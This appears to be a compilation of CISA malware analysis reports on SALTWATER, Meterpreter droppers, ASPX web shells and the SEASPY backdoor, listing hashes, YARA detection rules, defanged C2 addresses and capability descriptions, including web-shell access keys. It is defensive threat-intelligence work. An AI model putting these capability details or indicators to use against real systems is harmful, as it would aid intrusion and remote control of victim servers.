MD5 4ec4ceda84c580054f191caa09916c68
SHA1 6505513ca06db10b17f6d4792c30a53733309231
SHA256 caab341a35badbc65046bd02efa9ad2fe2671eb80ece0f2fa9cf70f5d7f4bedc
SHA512 c61493cfa3c6c41520b6ef608da9398b4fa6a7805293bc98d628335f536509d95585d42f93b8edeabf971390e874c5291b552afe66d72651839a295b76c42380
ssdeep 24576:25gY/a9MQrLO457KIRTQvAunkEKkb8EHA4pje0ET1Nyb+YpYcNvwoQItHzUMDb:25b8y45V2IVEHASjezfYHwoDzUM
Entropy 6.211061
Malware Result unknown
Antivirus
AhnLab Malware/Linux.Agent
Antiy Trojan/Linux.SaltWater.b
Bitdefender Trojan.Linux.Generic.313776
Emsisoft Trojan.Linux.Generic.313776 (B)
ESET a variant of Linux/SaltWater.B trojan
McAfee Generic trojan.xj
Quick Heal ELF.WhirlPool.48041.GC
Sophos Linux/Agnt-BS
YARA Rules
  • rule CISA_10454006_13 : SALTWATER backdoor exploit_kit communicates_with_c2 determines_c2_server hides_executing_code exploitation
    {
       meta:
           author = "CISA Code & Media Analysis"
           incident = "10454006"
           date = "2023-08-10"
           last_modified = "20230905_1500"
           actor = "n/a"
           family = "SALTWATER"
           capabilities = "communicates-with-c2 determines-c2-server hides-executing-code"
           malware_type = "backdoor exploit-kit"
           tool_type = "exploitation"
           description = "Detects SALTWATER samples"
           sha256 = "caab341a35badbc65046bd02efa9ad2fe2671eb80ece0f2fa9cf70f5d7f4bedc"
       strings:
           $s1 = { 70 74 68 72 65 61 64 5f 63 72 65 61 74 65 }
           $s2 = { 67 65 74 68 6f 73 74 62 79 6e 61 6d 65 }
           $s3 = { 54 72 61 6d 70 6f 6c 69 6e 65 }
           $s4 = { 64 73 65 6c 64 73 }
           $s5 = { 25 30 38 78 20 28 25 30 32 64 29 20 25 2d 32 34 73 20 25 73 25 73 25 73 0a }
           $s6 = { 45 6e 74 65 72 20 6f 75 73 63 64 6f 6f 65 7c 70 72 65 64 61 72 65 28 25 70 2c 20 25 70 2c 20 25 70 29 }
           $s7 = { 45 6e 74 65 72 20 61 75 74 63 63 6f 6f 71 38 63 72 65 61 74 65 }
           $s8 = { 74 6e 6f 72 6f 74 65 63 74 6a 73 65 6d 6f 72 79 }
           $s9 = { 56 55 43 4f 4d 49 53 53 }
           $s10 = { 56 43 4f 4d 49 53 53 }
           $s11 = { 55 43 4f 4d 49 53 44 }
           $s12 = { 41 45 53 4b 45 59 47 45 4e 41 53 53 49 53 54 }
           $s13 = { 46 55 43 4f 4d 50 50 }
           $s14 = { 55 43 4f 4d 49 53 53 }
       condition:
           uint16(0) == 0x457f and filesize }
ssdeep Matches

No matches found.

Description

This artifact, belonging to the SALTWATER malware family, is a 32-bit Linux Shared Object (.so) file. The malware can intake data over the network, using a previously established socket, with the 'recv' function as shown in Figure 11. Figure 12 shows the malware creating a new thread, within the calling process. This is thread injection and it can inject two different functions. Figure 13 shows the first function that can perform DNS resolution. Figures 14 and 15 show the second function. The second function can establish communications, over the network, using a TLS version 1 connection. Lastly, using 'popen', the malware can execute any shell command with the same privileges as its calling process.

Screenshots
Figure 11 - Figure 11 depicts the 'recv' Berkeley Sockets function dynamically loaded and executed at runtime.
Figure 11 - Figure 11 depicts the 'recv' Berkeley Sockets function dynamically loaded and executed at runtime.
Figure 12 - Figure 12 depicts the 'pthread_create' function.
Figure 12 - Figure 12 depicts the 'pthread_create' function.
Figure 13 - Figure 13 depicts multiple functions from the Berkley Sockets API.
Figure 13 - Figure 13 depicts multiple functions from the Berkley Sockets API.
Figure 14 - Figure 14 depicts functions that facilitate Secure Sockets Layer (SSL) and TLS communications.
Figure 14 - Figure 14 depicts functions that facilitate Secure Sockets Layer (SSL) and TLS communications.
Figure 15 - Figure 15 depicts the 'popen' function.
Figure 15 - Figure 15 depicts the 'popen' function.

Relationship Summary

44e1fbe71c... Used 9f04525835f998d454ed68cfc7fcb6b0907f2130ae6c6ab7495d41aa36ad8ccf
9f04525835... Used_By 44e1fbe71c9fcf9881230cb924987e0e615a7504c3c04d44ae157f07405e3598

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.

September 6, 2023

MAR-10430311-1.v1 Multiple Nation-State Threat Actors Exploit CVE-2022-47966 and CVE-2022-42475 | CISA

  

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:CLEAR--Recipients may share this information without restriction. Sources may use TLP:CLEAR when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:CLEAR information may be shared without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Summary

Description

CISA received 4 files for analysis from an incident response engagement conducted at an Aeronautical Sector organization.

2 files (bitmap.exe, wkHPd.exe) are identified as variants of Metasploit (Meterpreter) and designed to connect and receive unencrypted payloads from their respective command and control (C2) servers. Note: Metasploit is an open source penetration testing software; Meterpreter is a Metasploit attack payload that runs an interactive shell. These executables are used as attack payloads to run interactive shells, allowing a malicious actor the ability to control and execute code on a system.

2 files (resource.aspx, ConfigLogin.aspx) are Active Server Pages (ASPX) web shells designed to execute remote JavaScript code on the victim server.

CISA has provided indicators of compromise (IOCs) and YARA rules for detection within this Malware Analysis Report (MAR).

For more information about this compromise, see Joint Cybersecurity Advisory Multiple Nation-State Threat Actors Exploit CVE-2022-47966 and CVE-2022-42475.

Download the PDF version of this report:

For a downloadable copy of IOCs associated with this MAR in JSON format, see:

AR23-250A JSON (JSON, 57.41 KB )
Submitted Files (4)

334c2d0af191ed96b15095a4a098c400f2c0ce6b9c66d1800f6b74554d59ff4b (bitmap.exe)

47dacb8f0b157355a4fd59ccbac1c59b8268fe84f3b8a462378b064333920622 (resource.aspx)

6dcc7b5e913154abac69687fcfb6a58ac66ec9b8cc7de7afd8832a9066b7bdde (ConfigLogin.aspx)

79a9136eedbf8288ad7357ddaea3a3cd1a57b7c6f82adffd5a9540e1623bfb63 (wkHPd.exe)

IPs (2)

108[.]62[.]118[.]160

179[.]60[.]147[.]4

Findings

334c2d0af191ed96b15095a4a098c400f2c0ce6b9c66d1800f6b74554d59ff4b

Tags

downloaderobfuscatedtrojan

Details

-->

Name bitmap.exe
Size 7168 bytes
Type PE32+ executable (GUI) x86-64, for MS Windows
MD5 b8967a33e6c1aee7682810b6b994b991
SHA1 bbda2ad0634aa535b9df40dc39a2d4dfdd763476
SHA256 334c2d0af191ed96b15095a4a098c400f2c0ce6b9c66d1800f6b74554d59ff4b
SHA512 75b86d329c06a60b395d539eead76f27bc4055a9743f6f33bc48b4ef54a5d0587fbfaf9742515e73936df2b6a5498a84ae8c501f0f27b6c047e994f3afcc408d
ssdeep 24:eFGStrJ9u0/6BonZdkBQAV7YQKZqSeNDMSCvOXpmB:is0M8kBQDQkSD9C2kB
Entropy 1.315361
Malware Result unknown
Antivirus
AhnLab Trojan/Win64.Shelma
Antiy GrayWare/Win32.Rozena.j
Avira TR/Crypt.XPACK.Gen7
Bitdefender Trojan.Metasploit.A
CrowdStrike Falcon ML win/malicious_confidence_100
Cylance Malware
Emsisoft Trojan.Metasploit.A (B)
ESET a variant of Win64/Rozena.M trojan
Huorong Trojan/Obfuscated.dq
IKARUS Trojan.Win64.Meterpreter
K7 Trojan ( 004fae881 )
McAfee Trojan-FJIN!B8967A33E6C1
Quick Heal HackTool.Metasploit.S9212471
Sophos ATK/Meter-A
Varist W64/S-c4a4ef26!Eldorado
Vir.IT eXplorer Trojan.Win32.Generic.BZPS
Webroot SMD Malware
YARA Rules
  • rule CISA_10430311_01 : METERPRETER trojan downloader
    {
       meta:
           author = "CISA Code & Media Analysis"
           incident = "10430311"
           date = "2023-03-03"
           last_modified = "20230404_1200"
           actor = "n/a"
           family = "METERPRETER"
           Capabilities = "n/a"
           Malware_Type = "trojan downloader"
           Tool_Type = "n/a"
           description = "Detects trojan downloader samples"
           sha256_1 = "334c2d0af191ed96b15095a4a098c400f2c0ce6b9c66d1800f6b74554d59ff4b"
       strings:
           $s1 = { 49 be 77 73 32 5f 33 32 }
           $s2 = { 49 89 e6 48 81 ec a0 01 }
           $s3 = { 49 bc 02 00 e5 6b b3 3c 93 04 }
           $s4 = { 41 ba 4c 77 26 07 ff d5 }
           $s5 = { 41 ba ea 0f df e0 ff d5 }
           $s6 = { 41 ba 99 a5 74 61 ff d5 }
           $s7 = { 41 ba 02 d9 c8 5f ff d5 }
           $s8 = { 41 ba 58 a4 53 e5 ff d5 }
       condition:
           all of them
    }
  • rule CISA_10430311_02 : METERPRETER controls_local_machine compromises_data_integrity communicates_with_c2 keylogger exploit_kit remote_access_trojan back downloader screen_capture virus remote_access exploitation network_capture
    {
       meta:
           author = "CISA Code & Media Analysis"
           incident = "10430311"
           date = "2023-03-08"
           last_modified = "20230405_1300"
           actor = "n/a"
           family = "METERPRETER"
           Capabilities = "controls-local-machine compromises-data-integrity communicates-with-c2"
           Malware_Type = "keylogger exploit-kit remote-access-trojan backdoor downloader screen-capture virus"
           Tool_Type = "remote-access exploitation network-capture"
           description = "Detects Fresh Meterpreter bianary samples"
           sha256_1 = "79a9136eedbf8288ad7357ddaea3a3cd1a57b7c6f82adffd5a9540e1623bfb63"
           sha256_2 = "334c2d0af191ed96b15095a4a098c400f2c0ce6b9c66d1800f6b74554d59ff4b"
           sha256_3 = "6dcc7b5e913154abac69687fcfb6a58ac66ec9b8cc7de7afd8832a9066b7bdde"
           sha256_4 = "47dacb8f0b157355a4fd59ccbac1c59b8268fe84f3b8a462378b064333920622"
       strings:
           $s0 = { 58 a4 53 e5 }
           $s1 = { 02 d9 c8 5f }
           $s2 = { 99 a5 74 61 }
           $s3 = { 4c 77 26 07 }
           $s4 = { 29 80 6b 00 }
           $s5 = { 50 41 59 4c 4f 41 44 3a }
           $s6 = { 48 83 ec 28 49 c7 c1 40 }
       condition:
           all of them
    }
ssdeep Matches

No matches found.

Relationships
334c2d0af1... Connected_To 179[.]60[.]147[.]4
Description

This artifact is a malicious Windows executable file. The file is designed to connect to a remote Internet Protocol (IP) address "179[.]60[.]147[.]4" on Transmission Control Protocol (TCP) port 58731 and waits for a response. The response payload from the remote server is not encrypted and will be executed in memory. The payload was not available for analysis.

179[.]60[.]147[.]4

Tags

command-and-control

Ports
  • 58731 TCP
Whois

inetnum:     179.60.147.0/24
status:     reallocated
aut-num:     AS209588
owner:     Cloud Solutions S.A.
ownerid:     VE-CSSA1-LACNIC
responsible: Alexis Sanchez
address:     Av. Libertador, Distrito Capital, ---,
address:     1050 - Caracas -
country:     VE
phone:     +507 8589115
owner-c:     ALS317
tech-c:     ALS317
abuse-c:     ALS317
inetrev:     179.60.147.0/24
nserver:     NS1.SAFE-VPN.MOBI
nsstat:     20230302 AA
nslastaa:    20230302
nserver:     NS2.SAFE-VPN.MOBI
nsstat:     20230302 AA
nslastaa:    20230302
created:     20220301
changed:     20220301
inetnum-up: 179.60.144.0/21

nic-hdl:     ALS317
person:     Alexis Sanchez
e-mail:     [email protected]
address:     Av. Libertador, Distrito Capital, ---, ---
address:     1050 - Caracas -
country:     VE
phone:     +507 858 91 [15]
created:     20220301
changed:     20220301

Relationships
179[.]60[.]147[.]4 Connected_From 334c2d0af191ed96b15095a4a098c400f2c0ce6b9c66d1800f6b74554d59ff4b
Description

The malware C2 server IP address.

79a9136eedbf8288ad7357ddaea3a3cd1a57b7c6f82adffd5a9540e1623bfb63

Tags

obfuscatedtrojan

Details

-->

Name wkHPd.exe
Size 7168 bytes
Type PE32+ executable (GUI) x86-64, for MS Windows
MD5 76adb0e36aac40cae0ebeb9f4bd38b52
SHA1 82885f8c57cf4460f52db0a85e183d372f0aeb7e
SHA256 79a9136eedbf8288ad7357ddaea3a3cd1a57b7c6f82adffd5a9540e1623bfb63
SHA512 dc3547ca38bcdc00184537f9b2bac6201d9aa1541d172fc78050636b5f0d2c438defcab937f2ac056a0522c9727d2c3ea1636c69c9780ed553b146168956c121
ssdeep 24:eFGStrJ9u0/6kgnZdEBQAVXBYLYKZq4eNDMSeGV1iY0im+opmB:is0dUEBQpLYGSD9e8oYKkB
Entropy 1.418888
Malware Result unknown
Antivirus
AhnLab Trojan/Win64.Agent
Antiy GrayWare/Win32.Rozena.j
Avira TR/Crypt.XPACK.Gen7
Bitdefender Trojan.Metasploit.A
CrowdStrike Falcon ML win/malicious_confidence_100
Cylance Malware
Emsisoft Trojan.Metasploit.A (B)
ESET a variant of Win64/Rozena.M trojan
Huorong Trojan/Obfuscated.dq
IKARUS Trojan.Win64.Meterpreter
K7 Trojan ( 004fae881 )
McAfee Trojan-FJIN!76ADB0E36AAC
Quick Heal HackTool.Metasploit.S9212471
Sophos ATK/Meter-A
Varist W64/S-c4a4ef26!Eldorado
Vir.IT eXplorer Trojan.Win32.Generic.BZPS
Webroot SMD Malware
YARA Rules
  • rule CISA_10430311_02 : METERPRETER controls_local_machine compromises_data_integrity communicates_with_c2 keylogger exploit_kit remote_access_trojan back downloader screen_capture virus remote_access exploitation network_capture
    {
       meta:
           author = "CISA Code & Media Analysis"
           incident = "10430311"
           date = "2023-03-08"
           last_modified = "20230405_1300"
           actor = "n/a"
           family = "METERPRETER"
           Capabilities = "controls-local-machine compromises-data-integrity communicates-with-c2"
           Malware_Type = "keylogger exploit-kit remote-access-trojan backdoor downloader screen-capture virus"
           Tool_Type = "remote-access exploitation network-capture"
           description = "Detects Fresh Meterpreter bianary samples"
           sha256_1 = "79a9136eedbf8288ad7357ddaea3a3cd1a57b7c6f82adffd5a9540e1623bfb63"
           sha256_2 = "334c2d0af191ed96b15095a4a098c400f2c0ce6b9c66d1800f6b74554d59ff4b"
           sha256_3 = "6dcc7b5e913154abac69687fcfb6a58ac66ec9b8cc7de7afd8832a9066b7bdde"
           sha256_4 = "47dacb8f0b157355a4fd59ccbac1c59b8268fe84f3b8a462378b064333920622"
       strings:
           $s0 = { 58 a4 53 e5 }
           $s1 = { 02 d9 c8 5f }
           $s2 = { 99 a5 74 61 }
           $s3 = { 4c 77 26 07 }
           $s4 = { 29 80 6b 00 }
           $s5 = { 50 41 59 4c 4f 41 44 3a }
           $s6 = { 48 83 ec 28 49 c7 c1 40 }
       condition:
           all of them
    }
ssdeep Matches

No matches found.

Relationships
79a9136eed... Connected_To 108[.]62[.]118[.]160
Description

This file is a malicious 64-bit Windows Portable Executable (PE) that has been identified as a variant of the Metasploit Meterpreter application. The file is designed to connect to a remote Internet Protocol (IP) address 108[.]62[.]118[.]160.

108[.]62[.]118[.]160

Tags

command-and-control

Whois

NetRange:     108.62.0.0 - 108.62.255.255
CIDR:         108.62.0.0/16
NetName:        NET-108-62-0-0-1
NetHandle:     NET-108-62-0-0-1
Parent:         NET108 (NET-108-0-0-0-0)
NetType:        Direct Allocation
OriginAS:     AS15003
Organization: Leaseweb USA, Inc. (LU)
RegDate:        2010-12-13
Updated:        2021-02-15
Ref:            https://rdap.arin.net/registry/ip/108.62.0.0

OrgName:        Leaseweb USA, Inc.
OrgId:         LU
Address:        9480 Innovation Dr
City:         Manassas
StateProv:     VA
PostalCode:     20109
Country:        US
RegDate:        2010-09-13
Updated:        2019-08-13
Comment:        www.leaseweb.com
Ref:            https://rdap.arin.net/registry/entity/LU

Relationships
108[.]62[.]118[.]160 Connected_From 79a9136eedbf8288ad7357ddaea3a3cd1a57b7c6f82adffd5a9540e1623bfb63
Description

The malware attempts to connect to this IP address.

47dacb8f0b157355a4fd59ccbac1c59b8268fe84f3b8a462378b064333920622

Tags

backdoorwebshell

Details

-->

Name resource.aspx
Size 175 bytes
Type ASCII text, with no line terminators
MD5 1a0e111e60e543810423ef073b545c77
SHA1 23cb74b530c49837595d766492279cc0cdc4692d
SHA256 47dacb8f0b157355a4fd59ccbac1c59b8268fe84f3b8a462378b064333920622
SHA512 78a6e59bb9d9320d39249ee8ae94431a7cda608476f0adc9358e558b535ceccf12e219af16b14a40948986a01ad9128f8cf0240cde866197570fd70772e92d1c
ssdeep 3:6DZXA/fTGYpEHJCpHT55bct7fk8fwM2aA793nJKAqTGwPW1kyKN+1Ucv2+:6e3q+ugFIt7M8fwM/A7zKAqK6ykycKUU
Entropy 5.673036
Malware Result unknown
Antivirus
Huorong Backdoor/ASP.WebShell.aa
YARA Rules
  • rule CISA_10430311_03 : ASPX_WEBSHELL webshell
    {
       meta:
           author = "CISA Code & Media Analysis"
           incident = "10430311"
           date = "2023-03-21"
           last_modified = "20230404_1230"
           actor = "n/a"
           family = "ASPX Webshell"
           Capabilities = "n/a"
           Malware_Type = "webshell"
           Tool_Type = "n/a"
           description = "Detects OWA targeting ASPX Webshell samples"
           sha256_1 = "6dcc7b5e913154abac69687fcfb6a58ac66ec9b8cc7de7afd8832a9066b7bdde"
           sha256_1 = "47dacb8f0b157355a4fd59ccbac1c59b8268fe84f3b8a462378b064333920622"
       strings:
           $s1 = { 5a 30 32 6a 77 36 43 36 63 55 }
           $s2 = { 5a 38 49 30 32 38 33 6e 77 38 }
           $s3 = { 4f 57 41 77 65 62 63 6f 6e 66 69 67 }
           $s4 = { 54 55 43 53 4f 4e }
           $s5 = { 65 76 61 6c }
       condition:
           3 of them
    }
ssdeep Matches

No matches found.

Description

This artifact is an ASPX webshell that is designed to execute remote JavaScript code on the system. The attacker must authenticate to the webshell client with the key "OWAwebconfig" before executing the remote code. The 'unsafe' context keyword is intentionally obfuscated to bypass security protocols.

Screenshots

 

6dcc7b5e913154abac69687fcfb6a58ac66ec9b8cc7de7afd8832a9066b7bdde

Tags

backdoorwebshell

Details

-->

Name ConfigLogin.aspx
Size 169 bytes
Type ASCII text, with no line terminators
MD5 a33354d598b58f2e55eb3619c3465f24
SHA1 e1c6f76085234554e9a47b61105cd45981eb35d2
SHA256 6dcc7b5e913154abac69687fcfb6a58ac66ec9b8cc7de7afd8832a9066b7bdde
SHA512 180ee1378ff6ffd8b28c39208d8abb617e263defc74f6781f9f8efa373fd62c3aa0b99a4b77cf44432f9bfe4fd80f40620ffb884af2e440491d007b2e41e4d96
ssdeep 3:6DZX6VeeTEdYpEHJCpRZT55bcRRt+ek8fwM2aA42qPJKMWmdeuufKVeM+1Ucv2+:6NeTG+ug/JIi8fwM/A7qxKMWmgZMKUeb
Entropy 5.682974
Malware Result unknown
Antivirus
Huorong Backdoor/ASP.WebShell.aa
YARA Rules
  • rule CISA_10430311_03 : ASPX_WEBSHELL webshell
    {
       meta:
           author = "CISA Code & Media Analysis"
           incident = "10430311"
           date = "2023-03-21"
           last_modified = "20230404_1230"
           actor = "n/a"
           family = "ASPX Webshell"
           Capabilities = "n/a"
           Malware_Type = "webshell"
           Tool_Type = "n/a"
           description = "Detects OWA targeting ASPX Webshell samples"
           sha256_1 = "6dcc7b5e913154abac69687fcfb6a58ac66ec9b8cc7de7afd8832a9066b7bdde"
           sha256_1 = "47dacb8f0b157355a4fd59ccbac1c59b8268fe84f3b8a462378b064333920622"
       strings:
           $s1 = { 5a 30 32 6a 77 36 43 36 63 55 }
           $s2 = { 5a 38 49 30 32 38 33 6e 77 38 }
           $s3 = { 4f 57 41 77 65 62 63 6f 6e 66 69 67 }
           $s4 = { 54 55 43 53 4f 4e }
           $s5 = { 65 76 61 6c }
       condition:
           3 of them
    }
ssdeep Matches

No matches found.

Description

This artifact is an ASPX webshell that is designed to execute remote JavaScript code on the system. The attacker must authenticate to the webshell client with the key "TUCSON" before executing the remote code. The 'unsafe' context keyword is intentionally obfuscated to bypass security protocols.

Screenshots

 

Relationship Summary

334c2d0af1... Connected_To 179[.]60[.]147[.]4
179[.]60[.]147[.]4 Connected_From 334c2d0af191ed96b15095a4a098c400f2c0ce6b9c66d1800f6b74554d59ff4b
79a9136eed... Connected_To 108[.]62[.]118[.]160
108[.]62[.]118[.]160 Connected_From 79a9136eedbf8288ad7357ddaea3a3cd1a57b7c6f82adffd5a9540e1623bfb63

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.

August 9, 2023

MAR-10454006.r4.v2 SEASPY and WHIRLPOOL Backdoors | CISA

 

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:CLEAR--Recipients may share this information without restriction. Sources may use TLP:CLEAR when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:CLEAR information may be shared without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Summary

Description

CISA obtained four malware samples - including SEASPY and WHIRLPOOL backdoors. The device was compromised by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting versions 5.1.3.001-9.2.0.006 of Barracuda Email Security Gateway (ESG).

SEASPY is a persistent and passive backdoor that masquerades as a legitimate Barracuda service “BarracudaMailService” that allows the threat actors to execute arbitrary commands on the ESG appliance.

WHIRLPOOL is a backdoor that establishes a Transport Layer Security (TLS) reverse shell to the Command-and-Control (C2) server.

For information about related malware, specifically information on the initial exploit payload, a second SEASPY backdoor variant, and the SUBMARINE backdoor, see CISA Alert: CISA Releases Malware Analysis Reports on Barracuda Backdoors.

Download the PDF version of this report:

AR23-221A PDF (PDF, 382.40 KB )

For a downloadable copy of IOCs associated with this MAR in JSON format, see:

AR23-221A JSON (JSON, 49.40 KB )
Submitted Files (4)

29a41174eb9a39e0ad712ed5063c561e9c2e1db1f8f6b04b2ca369a6efc3ac9b (QuoVadis_Root_CA_1_G3.pem)

3f26a13f023ad0dcd7f2aa4e7771bba74910ee227b4b36ff72edc5f07336f115 (BarracudaMailService.old)

83ca636253fd1eb898b244855838e2281f257bbe8ead428b69528fc50b60ae9c (rverify)

9bb7addd96f99a29658aca9800b66046823c5ef0755e29012983db6f06a999cf (resize_reisertab)

Findings

3f26a13f023ad0dcd7f2aa4e7771bba74910ee227b4b36ff72edc5f07336f115

Tags

trojan

Details

-->

Name BarracudaMailService.old
Size 2924217 bytes
Type ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.26, BuildID[sha1]=598b486976708dc59ecf3fdec8727b82df63b7de, with debug_info, not stripped
MD5 4ca4f582418b2cc0626700511a6315c0
SHA1 0ea36676bd7169bcbf432f721c4edb5fde0a46a9
SHA256 3f26a13f023ad0dcd7f2aa4e7771bba74910ee227b4b36ff72edc5f07336f115
SHA512 71e0aaaf8981782ccb09331548d2458671d1dd65433052e44583ece98fffda9b6f0a3805d6d9c653dd0e1378602a7c1a3b0482a563b6644af49c908876ec1a3b
ssdeep 49152:X7PdfV6LWGqla76yHbSgfrNr1glmyifFTZwwP80WhpKG:zdfBlm6cbxr1pDw30WhpKG
Entropy 6.167504
Malware Result unknown
Antivirus
AhnLab HackTool/Linux.Reverseshell
Antiy Trojan/Win32.Casdet
Bitdefender Trojan.Linux.Generic.298175
Emsisoft Trojan.Linux.Generic.298175 (B)
ESET Linux/SeaSpy.A trojan
McAfee ELF/Barracuda.a
Quick Heal ELF.Barracuda.47823.GC
Sophos Linux/Agnt-BS
Varist E64/SeaSpy.A
YARA Rules
  • rule CISA_10452108_01 : SEASPY backdoor communicates_with_c2 installs_other_components
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10452108"
           Date = "2023-06-20"
           Last_Modified = "20230628_1000"
           Actor = "n/a"
           Family = "SEASPY"
           Capabilities = "communicates-with-c2 installs-other-components"
           Malware_Type = "backdoor"
           Tool_Type = "unknown"
           Description = "Detects malicious Linux SEASPY samples"
           SHA256_1 = "3f26a13f023ad0dcd7f2aa4e7771bba74910ee227b4b36ff72edc5f07336f115"
           SHA256_2 = "69935a1ce0240edf42dbe24535577140601bcf3226fa01e4481682f6de22d192"
           SHA256_3 = "5f5b8cc4d297c8d46a26732ae47c6ac80338b7be97a078a8e1b6eefd1120a5e5"
           SHA256_4 = "10efa7fe69e43c189033006010611e84394569571c4f08ea1735073d6433be81"
       strings:
           $s0 = { 2e 2f 42 61 72 72 61 63 75 64 61 4d 61 69 6c 53 65 72 76 69 63 65 20 65 74 68 30 }
           $s1 = { 75 73 61 67 65 3a 20 2e 2f 42 61 72 72 61 63 75 64 61 4d 61 69 6C 53 65 72 76 69 63 65 20 3c 4e 65 74 77 6f 72 6b 2d 49 6e 74 65 72 66 61 63 65 }
           $s2 = { 65 6e 74 65 72 20 6f 70 65 6e 20 74 74 79 20 73 68 65 6c 6c }
           $s3 = { 25 64 00 4e 4f 20 70 6f 72 74 20 63 6f 64 65 }
           $s4 = { 70 63 61 70 5f 6c 6f 6f 6b 75 70 6e 65 74 3a 20 25 73 }
           $s5 = { 43 68 69 6c 64 20 70 72 6f 63 65 73 73 20 69 64 3a 25 64 }
           $s6 = { 5b 2a 5d 53 75 63 63 65 73 73 21 }
           $a7 = { bf 90 47 90 ec 18 fe e3 83 e2 a9 f7 8d 85 18 1d }
           $a8 = { 81 35 1e f0 94 ab 2a ba 5d f0 37 76 69 19 9f 1e }
           $a9 = { 6a 8e c7 89 ce c1 fe 64 78 a6 e1 c5 fe 03 d1 a7 }
           $a10 = { c2 ff d1 0d 24 23 ec c0 57 f9 8d 4b 05 34 41 b8 }
       condition:
           uint32(0) == 0x464c457f and (all of ($s*)) or ( all of ($a*))
    }
ssdeep Matches

No matches found.

Relationships
3f26a13f02... Related_To 29a41174eb9a39e0ad712ed5063c561e9c2e1db1f8f6b04b2ca369a6efc3ac9b
Description

